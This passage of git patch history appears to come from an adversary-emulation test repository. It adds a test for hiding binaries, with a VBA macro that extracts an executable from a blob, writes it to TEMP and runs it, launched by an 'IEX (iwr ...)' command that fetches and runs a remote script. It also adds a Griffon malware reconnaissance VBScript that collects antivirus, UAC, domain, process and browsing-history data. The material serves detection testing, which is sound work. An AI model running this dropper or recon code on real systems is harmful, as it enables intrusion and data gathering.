RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
## Atomic Tests diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 0003e3ee..8b98a0c9 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -627,3 +627,11 @@ f38e9eea-e1d7-4ba6-b716-584791963827 9a2915b3-3954-4cce-8c76-00fbf4dbd014 e8209d5f-e42d-45e6-9c2f-633ac4f1eefa 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 +ecd3fa21-7792-41a2-8726-2c5c673414d3 +3ad4a037-1598-4136-837c-4027e4fa319b +1c91e740-1729-4329-b779-feba6e71d048 +8faff437-a114-4547-9a60-749652a03df6 +9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 +234f9b7c-b53d-4f32-897b-b880a6c9ea7b +7cbb0f26-a4c1-4f77-b180-a009aa05637e +4cc40fd7-87b8-4b16-b2d7-57534b86b911 diff --git a/docs/maintainers.md b/docs/maintainers.md index 832d2d60..56ed282e 100644 --- a/docs/maintainers.md +++ b/docs/maintainers.md @@ -21,11 +21,15 @@ Any breaking change or major feature should be communicated to the community via # Maintainers Meeting Cadence ## Sync Meetings -1. Review any issues labeled `maintainers` and make or plan decisions accordingly. -2. Review Atomic Friday schedule and assign related tasks as needed. -2. Open discussion +Sync meetings are more frequent and less formal, and may be conducted via Zoom, Slack, or email depending on the nature of issues to be discussed. Items that are commonly raised during sync meetings include: + +1. Progress or communications related to milestones +1. Issues labeled `maintainers` or that are otherwise blocked +2. Time-sensitive decisions that need to be made ## Planning Meetings -1. Review existing milestones and progress. -2. Identify future milestones. -3. Prioritize and tentatively schedule future milestones (i.e., update the roadmap). +Planning meetings are less frequent, and minutes will be kept and published via GitHub. These meetings are conducted via Zoom, and require that a majority of the core maintainers team be present. + +1. Review existing milestones and progress +2. Identify future milestones +3. Prioritize and tentatively schedule future milestones From 78507aedceaf80dcd340e17fe57d5ac09123e420 Mon Sep 17 00:00:00 2001 From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com> Date: Wed, 16 Dec 2020 10:46:56 -0500 Subject: [PATCH 010/131] Extractbinary (#1332) * initial * moving file * hard-code to winword process Co-authored-by: avocado Co-authored-by: Carrie Roberts --- atomics/T1564/T1564.yaml | 40 ++++++++++++++++++++++ atomics/T1564/bin/extractme.bin | Bin 0 -> 33022 bytes atomics/T1564/src/T1564-macrocode.txt | 46 ++++++++++++++++++++++++++ 3 files changed, 86 insertions(+) create mode 100644 atomics/T1564/T1564.yaml create mode 100644 atomics/T1564/bin/extractme.bin create mode 100644 atomics/T1564/src/T1564-macrocode.txt diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml new file mode 100644 index 00000000..9a59a90b --- /dev/null +++ b/atomics/T1564/T1564.yaml @@ -0,0 +1,40 @@ +attack_technique: T1564 +display_name: "Hide Artifacts" +atomic_tests: +- name: Extract binary files via VBA + auto_generated_guid: + description: | + This module extracts a binary (calc.exe) from inside of another binary. + + In the wild maldoc authors will use this technique to hide binaries inside of files stored + within the office document itself. An example of this technique can be seen in sample + + f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226 + + This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2 + is the same document without all the malicious code. Document 1 will copy Document 2 to the file system + and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this + oleObject.bin file is a payload that is parsed out and executed on the file system. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: | + Microsoft Word must be installed + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft Word manually to meet this requirement" + executor: + command: | + $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") + $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap + cleanup_command: | + Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore + name: powershell diff --git a/atomics/T1564/bin/extractme.bin b/atomics/T1564/bin/extractme.bin new file mode 100644 index 0000000000000000000000000000000000000000..96610b473e10d0f61391db33b700caad5c7982a3 GIT binary patch literal 33022 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 X^!`Kl14lpS(JVT|kNM~SI}Q9lD#F_V literal 0 HcmV?d00001 diff --git a/atomics/T1564/src/T1564-macrocode.txt b/atomics/T1564/src/T1564-macrocode.txt new file mode 100644 index 00000000..98759b8a --- /dev/null +++ b/atomics/T1564/src/T1564-macrocode.txt @@ -0,0 +1,46 @@ +Sub Extract() + + Dim peBin% + Dim byt As Byte + Dim memArray() As Variant + + peBin = FreeFile + FName = "aREPLACEMEa" + outName = Environ$("TEMP") + "\extracted.exe" + Open FName For Binary Access Read As peBin + + cnt = 0 + + Do While Not EOF(peBin) + Get peBin, , byt + If Hex(byt) = "4D" Then + ReDim Preserve memArray(cnt) + memArray(cnt) = Hex(byt) + cnt = cnt + 1 + Get peBin, , byt + If Hex(byt) = "5A" Then + ReDim Preserve memArray(cnt) + memArray(cnt) = Hex(byt) + cnt = cnt + 1 + Get peBin, , byt + Do While Not EOF(peBin) + ReDim Preserve memArray(cnt) + memArray(cnt) = Hex(byt) + cnt = cnt + 1 + Get peBin, , byt + Loop + End If + End If + Loop + + Close peBin + + Open (outName) For Binary Lock Read Write As #1 + For a = 0 To UBound(memArray) + Put #1, , CByte("&h" & memArray(a)) + Next a + Close + + Call Shell(outName, vbNormalFocus) + +End Sub From 1eaae6d3ce7f2840a28f38298c86885c47a671ef Mon Sep 17 00:00:00 2001 From: JB <35406993+cherokeejb@users.noreply.github.com> Date: Wed, 16 Dec 2020 10:19:14 -0600 Subject: [PATCH 011/131] Added T1082 test 8, Griffon recon advanced tool (#1320) * Create T1595.002.yaml * Added vbscript (griffon recon) for test 1 Script ref. (public gist) https://gist.githubusercontent.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d/raw/55ecbf8f83c36984371a335991f6cf4f2022319b/gistfile1.txt * added run as priv user n/a * removed guid accidentally put in * removed extra line * checking syntax final * remove dependency line * minor updates to invoke the build process again * removing elevation required thanks for that additional review, carrie * moving to T1082 per review * adding test 8 (griffon recon) * create griffon_recon.vbs for test 8 script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), and it gives the exact same recon behavior, hash mentioned in the code, as the original (minus the C2 interaction). * moving vbs file to T1082 per review Co-authored-by: Carrie Roberts --- atomics/T1082/T1082.yaml | 18 +- atomics/T1082/src/griffon_recon.vbs | 575 ++++++++++++++++++++++++++++ 2 files changed, 592 insertions(+), 1 deletion(-) create mode 100644 atomics/T1082/src/griffon_recon.vbs diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index ccd5e32f..406e8f29 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -108,4 +108,20 @@ atomic_tests: command: | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid name: command_prompt - +- name: Griffon Recon + description: |- + Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool. + This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), + and it gives the exact same recon behavior as the original (minus the C2 interaction). + For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/ + supported_platforms: + - windows + input_arguments: + vbscript: + description: Path to sample script + type: String + default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs + executor: + command: 'cscript #{vbscript}' + name: powershell + elevation_required: false diff --git a/atomics/T1082/src/griffon_recon.vbs b/atomics/T1082/src/griffon_recon.vbs new file mode 100644 index 00000000..509a1a39 --- /dev/null +++ b/atomics/T1082/src/griffon_recon.vbs @@ -0,0 +1,575 @@ +'' Griffon main actions start here. + +Set file_system_object = CreateObject("Scripting.FileSystemObject") +temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName + +' Start the detailed recon. +recon_info_str = get_network_adapter_info +network_info_str = "" +recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&" +recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&" +recon_info_str = recon_info_str & "NetworkInfo" & "=" & network_info_str & "&" +recon_info_str = recon_info_str & "ProcessList" & "=" & get_product_or_process_info("Win32_Process") & "&" +recon_info_str = recon_info_str & "DesktopFileList" & "=" & get_files_on_desktop_info() & "&" +recon_info_str = recon_info_str & "DesktopScreenshot" & "=NoScreenshot&" +recon_info_str = recon_info_str & "WebHistory" & "=" & get_web_history_info & "&" +recon_info_str = recon_info_str & "SecurityInfo=" & get_security_info() & "&" +recon_info_str = recon_info_str & "UACInfo" & get_uac_info() & "&" + +' Write out the recon info. +write_out_recon(recon_info_str) + +' Done. Zero out variables and exit. +Set wscript_network_object = Nothing +Set unj7 = Nothing +Set wmi_object = Nothing +Set wscript_shell_object = Nothing +Set adodb_stream_object = Nothing +Set dropped_file = Nothing +Set file_system_object = Nothing + +Sub write_out_recon(s) + WScript.Echo s +End Sub + +Function get_ldap_info() + On Error Resume Next + Err.Clear + Const const_2 = 2 + Set adodb_connection_object = CreateObject("ADODB.Connection") + Set adodb_stream_object = CreateObject("ADODB.Stream") + Set wscript_network_object = CreateObject("WScript.Network") + UserDomain = wscript_network_object.UserDomain + Set ldap_server_info_object = GetObject("LDAP://" & UserDomain & "/RootDSE") + If (VarType(ldap_server_info_object) <> vbObject) Then + get_ldap_info = -1 + Exit Function + End If + ldap_default_naming_context = ldap_server_info_object.Get("defaultNamingContext") + adodb_connection_object.Provider = "ADsDSOObject" + adodb_connection_object.Open "Active Directory Provider" + Set adodb_stream_object.ActiveConnection = adodb_connection_object + adodb_stream_object.Properties("Page Size") = 1000 + adodb_stream_object.Properties("Searchscope") = const_2 + ldap_search_string = "LDAP://" + ldap_default_naming_context + adodb_stream_object.CommandText = "SELECT cn FROM '" & ldap_search_string & "' WHERE objectCategory='Computer' AND objectClass='computer'" + Set ldap_query_results = adodb_stream_object.Execute + get_ldap_info = ldap_query_results.RecordCount + Set adodb_connection_object = Nothing + Set adodb_stream_object = Nothing + Set ldap_server_info_object = Nothing + Set ldap_query_results = Nothing + On Error GoTo 0 +End Function + +Function get_uac_info() + get_uac_info = "" + On Error Resume Next + Err.Clear + Set wscript_shell_object = CreateObject("WScript.Shell") + If wscript_shell_object.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA") = 0 Then + get_uac_info = "UAC: Off&&&" + Else + get_uac_info = "UAC: On&&&" + End If + If wscript_shell_object.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin") = 0 Then + get_uac_info = get_uac_info + "Will you be prompted to allow elevation for administrator: No&&&" + Else + get_uac_info = get_uac_info + "Will you be prompted to allow elevation for administrator: Yes&&&" + End If + If wscript_shell_object.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop") = 0 Then + get_uac_info = get_uac_info + "Prompt for elevation permission prompt: Interactive&&&" + Else + get_uac_info = get_uac_info + "Prompt window for elevation permission: On secure desktop&&&" + End If + On Error GoTo 0 +End Function + +Function get_antivirus_info() + get_antivirus_info = "" + On Error Resume Next + Err.Clear + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2") + For Each query_result in wmi_object.ExecQuery("Select * from AntiVirusProduct") + get_antivirus_info = get_antivirus_info + "AntiVirus:" + query_result.displayName + "%%%" + Next + On Error GoTo 0 +End Function + +Function get_files_on_desktop_info() + get_files_on_desktop_info = "" + On Error Resume Next + Err.Clear + Set wscript_shell_object = CreateObject("WScript.Shell") + desktop_folder_object = wscript_shell_object.SpecialFolders("Desktop") + Set Files = file_system_object.GetFolder(desktop_folder_object).Files + For Each File In Files + get_files_on_desktop_info = get_files_on_desktop_info & File.Name & "%%%" + Next + On Error GoTo 0 +End Function + +Function get_processor_info() + On Error Resume Next + Err.Clear + get_processor_info = "" + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + generic_loop_index = 1 + For Each query_result in wmi_object.ExecQuery("SELECT * FROM Win32_Processor",,48) + get_processor_info = get_processor_info + "Processor" & CStr(generic_loop_index) & ": " & query_result.Caption + " ~" + CStr(query_result.MaxClockSpeed) + " Mhz" + "%%%" + generic_loop_index = generic_loop_index + 1 + Next + On Error GoTo 0 +End Function + +Function get_quickfix_engineering_info() + On Error Resume Next + Err.Clear + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + generic_loop_index = 0 + get_quickfix_engineering_info = "" + For Each query_result in wmi_object.ExecQuery("SELECT * FROM Win32_QuickFixEngineering",,48) + generic_loop_index = generic_loop_index + 1 + get_quickfix_engineering_info = get_quickfix_engineering_info + "QuickFixEngineering" & CStr(generic_loop_index) & ": " & query_result.HotFixID + "%%%" + Next + get_quickfix_engineering_info = "QuickFixEngineering_Count-" & CStr(generic_loop_index) & ": " + "%%%" + get_quickfix_engineering_info + On Error GoTo 0 +End Function + +Function get_pagefile_info() + get_pagefile_info = "" + On Error Resume Next + Err.Clear + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + generic_loop_index = 1 + For Each query_result in wmi_object.ExecQuery("SELECT * FROM Win32_PageFileSetting",,48) + get_pagefile_info = get_pagefile_info + "Paging file location" & CStr(generic_loop_index) & ": " & query_result.Caption + "%%%" + generic_loop_index = generic_loop_index + 1 + Next + If get_pagefile_info = "" Then + generic_loop_index = 1 + For Each query_result in wmi_object.ExecQuery("SELECT * FROM Win32_PageFileUsage",,48) + get_pagefile_info = get_pagefile_info + "Paging file location" & CStr(generic_loop_index) & ": " & query_result.Caption + "%%%" + generic_loop_index = generic_loop_index + 1 + Next + End If + On Error GoTo 0 +End Function + +Function check_not_array(array_to_check) + On Error Resume Next + check_not_array = True + If IsArray(array_to_check) Then check_not_array = False + On Error GoTo 0 +End Function + +Function get_network_adapter_info() + get_network_adapter_info="" + On Error Resume Next + Err.Clear + Set wmi_object = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") + Set win32_group_query_results = wmi_object.ExecQuery("Select * From Win32_NetworkAdapterConfiguration WHERE IPEnabled = True") + For Each query_result In win32_group_query_results + get_network_adapter_info = vbNullString + get_network_adapter_info = get_network_adapter_info & "id=" & Replace(query_result.MACAddress, ":", "") & "&type=put&" + get_network_adapter_info = get_network_adapter_info & "Hostname=" & query_result.DNSHostName & "&" + Next + Set win32_group_query_results = wmi_object.ExecQuery("Select * from Win32_ComputerSystem") + For Each query_result In win32_group_query_results + If query_result.DomainRole Then + get_network_adapter_info = get_network_adapter_info & "DomainMember=yes&" + Else + get_network_adapter_info = get_network_adapter_info & "DomainMember=no&" + End If + get_network_adapter_info = get_network_adapter_info & "DomainName=" & query_result.Domain & "&" + If query_result.DomainRole Then + get_network_adapter_info = get_network_adapter_info & "DomainHosts=" & get_ldap_info & "&" + Else + get_network_adapter_info = get_network_adapter_info & "DomainHosts=-1&" + End If + Set wscript_network_object = CreateObject("WScript.Network") + network_user_name = wscript_network_object.UserName + get_network_adapter_info = get_network_adapter_info & "UserName=" & network_user_name & "&" + Next + Set Drives = file_system_object.Drives + StrDrives = "" + 